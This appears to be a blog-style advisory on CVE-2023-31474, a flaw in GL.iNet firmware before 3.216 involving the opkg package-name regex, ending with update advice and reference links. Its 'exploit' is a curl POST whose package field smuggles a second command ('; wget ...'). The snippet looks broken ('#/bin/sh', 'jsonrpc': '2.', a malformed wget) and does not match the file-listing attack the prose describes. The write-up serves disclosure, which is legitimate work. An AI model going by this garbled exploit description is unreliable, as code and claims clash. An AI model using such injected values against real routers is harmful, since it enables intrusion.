A recent security vulnerability was discovered in GL.iNet devices running firmware versions before 3.216. This vulnerability, identified as CVE-2023-31474, could allow attackers to perform directory traversal attacks to obtain a list of files in specific directories on the device by injecting arbitrary parameters into a request using the regex feature in an opkg package name. This post will provide an overview of the vulnerability, including its potential impact, as well as a code snippet demonstrating the exploit and links to the original references.
Overview
GL.iNet devices are popular IoT (Internet of Things) devices that provide various networking and communication features, such as Wi-Fi routers and modems. The specific vulnerability identified affects the software installation feature, which uses opkg, a package management system widely used in the OpenWrt embedded Linux ecosystem, for installation and management of software packages on the device.
An attacker exploiting this vulnerability can manipulate the package name regex feature during software installation to inject arbitrary parameters into the request, which will cause opkg to obtain and display a list of files in a specified directory. This vulnerability could potentially lead to unauthorized access to sensitive information, as well as further exploitation if the attacker discovers other system vulnerabilities by gaining access to this information.
Exploit Details
The exploit can be executed using a web-based or command-line interface and is relatively straightforward. The attacker simply needs to insert arbitrary parameters into a request during the software installation process using the regex feature in the package name. Below is a code snippet illustration of the exploit:
#/bin/sh
curl -k -X POST https://192.168.1.1/cgi-bin/admin/api -H 'Content-Type: application/json' -d '{
"jsonrpc": "2.",
"id": 1,
"method": "opkg_install_pkg",
"params": {"package": "luci-app-vsftpd; wget -O/tmp/vuln_path /vuln_path", "input_text": "6"}
}'
This code snippet demonstrates how an attacker could submit a request to install the luci-app-vsftpd package, but with an arbitrary parameter injected, causing the opkg to obtain a list of files in the specified directory and potentially exposing sensitive information on the target device.
Links to Original References
Further details on the vulnerability, such as proof-of-concept code, mitigation techniques, and potential alternate attack vectors, can be found in the following references:
1. GitHub - https://github.com/gl-inet/GL-S130/issues/3
2. GL.iNet Forum - https://forum.gl-inet.com/t/security-issues-new-firmware-beta-test/16297
3. CVE-2023-31474 - https://www.cvedetails.com/cve/CVE-2023-31474/
Conclusion
CVE-2023-31474 is a concerning security vulnerability affecting GL.iNet devices running firmware versions before 3.216. Owners of these devices should update their firmware to the latest version to prevent the exploitation of this vulnerability. In general, it is crucial to keep devices up-to-date with the latest patches and configurations to ensure robust security, as new exploits are discovered and threat actors continually evolve in their tactics and techniques.
Timeline
Published on: 05/09/2023 18:15:00 UTC
Last modified on: 05/16/2023 19:17:00 UTC